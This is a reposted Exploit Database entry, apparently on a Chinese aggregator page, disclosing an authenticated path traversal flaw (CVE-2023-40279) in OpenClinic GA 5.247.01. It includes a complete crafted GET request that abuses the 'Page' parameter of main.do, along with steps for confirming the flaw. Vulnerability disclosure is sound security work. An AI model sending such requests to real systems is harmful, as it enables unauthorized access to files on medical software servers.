OpenClinic GA 5.247.01 – Path Traversal (Authenticated)

• Exploit Database
• 17 阅读

• 作者： VB
  日期： 2024-04-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51995/

• # Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
  # Date: 2023-08-14
  # Exploit Author: V. B.
  # Vendor Homepage: https://sourceforge.net/projects/open-clinic/
  # Software Link: https://sourceforge.net/projects/open-clinic/
  # Version: OpenClinic GA 5.247.01
  # Tested on: Windows 10, Windows 11
  # CVE: CVE-2023-40279
  
  # Details
  An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.
  
  # Proof of Concept (POC)
  Steps to Reproduce:
  
  - Crafting the Malicious GET Request:
  
  - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
  - Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):
  
  GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
  Host: 192.168.100.5:10088
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
  Connection: close
  Cookie: JSESSIONID=[SESSION ID]
  Cache-Control: max-age=0
  
  2. Confirming the Vulnerability:
  - Send the crafted GET request to the target server.
  - If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
  - This vulnerability can lead to sensitive information disclosure or more severe attacks.